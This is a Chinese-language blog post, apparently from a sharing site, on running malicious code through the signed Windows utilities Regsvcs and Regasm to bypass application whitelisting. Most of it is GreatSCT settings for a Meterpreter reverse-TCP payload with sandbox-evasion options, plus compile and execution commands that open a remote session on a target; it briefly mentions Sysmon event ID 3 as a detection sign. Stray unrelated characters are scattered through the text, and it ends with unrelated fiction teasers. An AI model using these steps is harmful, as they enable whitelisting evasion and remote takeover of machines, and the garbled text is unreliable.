在windows上執(zhí)行惡意代碼 by Regsvcs & Regasm

Regsvcs & Regasm

Regsvcs和Regasm是Windows命令行實用程序,用于注冊.NET組件對象模型(COM)程序集症昏。兩者都是由Microsoft進行數(shù)字簽名的随闽。
攻擊者可以使用Regsvcs和Regasm代理通過受信任的Windows實用程序執(zhí)行代碼。兩個實用程序可用于通過使用二進制內(nèi)的屬性來繞過進程白名單掘宪,以指定應在注冊或取消注冊之前運行的代碼:[ComRegisterFunction]或[ComUnregisterFunction]分別蛾扇。即使進程在權限不足的情況下運行并且無法執(zhí)行魏滚,也將執(zhí)行具有注冊和取消注冊屬性的代碼镀首。

regasm

目前只知道.netframework 4.0的利用方式——GreatSct框架。
仔細看下配置項鼠次,看來也有反調(diào)試措施更哄。

Payload: regasm/meterpreter/rev_tcp selected

Required Options:

Name                Value       Description
----                -----       -----------
COMPILE_TO_DLL      Y           Compile to a DLL
DEBUGGER            X           Optional: Check if debugger is attached
DOMAIN              X           Optional: Required internal domain
EXPIRE_PAYLOAD      X           Optional: Payloads expire after "Y" days
HOSTNAME            X           Optional: Required system hostname
INJECT_METHOD       Heap        Virtual or Heap
LHOST                           IP of the Metasploit handler
LPORT               4444        Port of the Metasploit handler
PROCESSORS          X           Optional: Minimum number of processors
SLEEP               X           Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE            X           Optional: Check to validate not in UTC
USERNAME            X           Optional: The required user account

然后執(zhí)行generate

 [*] Language: regasm
 [*] Payload Module: regasm/meterpreter/rev_tcp
 [*] DLL written to: /usr/share/greatsct-output/compiled/payload1.dll
 [*] Source code written to: /usr/share/greatsct-output/source/payload1.cs
 [*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload1.dll
 [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload1.rc

msfconsoleshow advanced是個好習慣成翩,可以看到更多的配置項。

可以選擇手動編譯源文件
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library payload.cs
目標機上加載生成好的payload.dll即可創(chuàng)建會話

C:\Users\Administrator>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\payload1.dll
Microsoft (R) .NET Framework Assembly Registration Utility 4.0.30319.1
Copyright (C) Microsoft Corporation 1998-2004.  All rights reserved.

僵在這里不動了

sysmon日志
regasm.exe會發(fā)起反彈連接捕传,觸發(fā)事件ID 3

regsvcs

唯一的要求是組裝的文件需要使用強名稱進行簽名扩劝。 Microsoft已經(jīng)發(fā)布了名為Sn.exe(Strong Name Tool)的實用程序,它是Visual Studio和.NET框架工具的一部分棒呛,可用于生成一對公鑰和私鑰。

可以跟上面一樣手動編譯源文件(并不需要sn生成的key)
GreatSct會幫你編譯好dll文件簇秒,直接在目標機上執(zhí)行即可獲得會話。

C:\Users\Administrator>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
 c:\payload2.dll
Microsoft (R) .NET Framework Services Installation Utility Version 4.0.30319.1
Copyright (c) Microsoft Corporation.  All rights reserved.

也是僵在這邊

sysmon日志
regasm.exe也會發(fā)起反彈連接扛禽,觸發(fā)事件ID 3

自我小結

  1. 利用編程語言c#可以在內(nèi)存加載shellcode皱坛,在目標主機上用net框架的csc.exe來編譯成dll或者pe,借助白名單exe調(diào)用執(zhí)行剩辟。
  2. 本機直接生成dll或者pe,借助白名單exe調(diào)用執(zhí)行熊户。
  3. 加載遠程或本地sct文件或者inf文件吭服,里面用js(或vb)生成wscript.shell對象并執(zhí)行命令。而這些命令可以是1艇棕、2點
  4. 目前能直接內(nèi)存落地shellcode只有powershell绿饵。
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末瓶颠,一起剝皮案震驚了整個濱河市刺桃,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌桃移,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,378評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件借杰,死亡現(xiàn)場離奇詭異进泼,居然都是意外死亡,警方通過查閱死者的電腦和手機绞惦,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,356評論 2 382
  • 文/潘曉璐 我一進店門洋措,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人菠发,你說我怎么就攤上這事⊙阆纾” “怎么了?”我有些...
    開封第一講書人閱讀 152,702評論 0 342
  • 文/不壞的土叔 我叫張陵蔗怠,是天一觀的道長吩跋。 經(jīng)常有香客問我,道長桥温,這世上最難降的妖魔是什么梁丘? 我笑而不...
    開封第一講書人閱讀 55,259評論 1 279
  • 正文 為了忘掉前任旺韭,我火速辦了婚禮掏觉,結果婚禮上,老公的妹妹穿的比我還像新娘澳腹。我一直安慰自己,他們只是感情好酱塔,可當我...
    茶點故事閱讀 64,263評論 5 371
  • 文/花漫 我一把揭開白布羊娃。 她就那樣靜靜地躺著,像睡著了一般蕊玷。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上垃帅,一...
    開封第一講書人閱讀 49,036評論 1 285
  • 那天挺智,我揣著相機與錄音祷愉,去河邊找鬼赦颇。 笑死,一個胖子當著我的面吹牛订讼,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播欺殿,決...
    沈念sama閱讀 38,349評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼鳖敷,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了棍潘?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 36,979評論 0 259
  • 序言:老撾萬榮一對情侶失蹤亦歉,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后水由,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體赛蔫,經(jīng)...
    沈念sama閱讀 43,469評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,938評論 2 323
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了圾结。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,059評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡晌姚,死狀恐怖歇竟,靈堂內(nèi)的尸體忽然破棺而出挥唠,到底是詐尸還是另有隱情焕议,我是刑警寧澤,帶...
    沈念sama閱讀 33,703評論 4 323
  • 正文 年R本政府宣布唤锉,位于F島的核電站别瞭,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏蝙寨。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 39,257評論 3 307
  • 文/蒙蒙 一听系、第九天 我趴在偏房一處隱蔽的房頂上張望虹菲。 院中可真熱鬧跛锌,春花似錦、人聲如沸菠赚。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,262評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽必盖。三九已至,卻和暖如春歌粥,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背失驶。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評論 1 262
  • 我被黑心中介騙來泰國打工嬉探, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人逞姿。 一個月前我還...
    沈念sama閱讀 45,501評論 2 354
  • 正文 我出身青樓滞造,卻偏偏與公主長得像续室,于是被迫代替她去往敵國和親谒养。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 42,792評論 2 345

推薦閱讀更多精彩內(nèi)容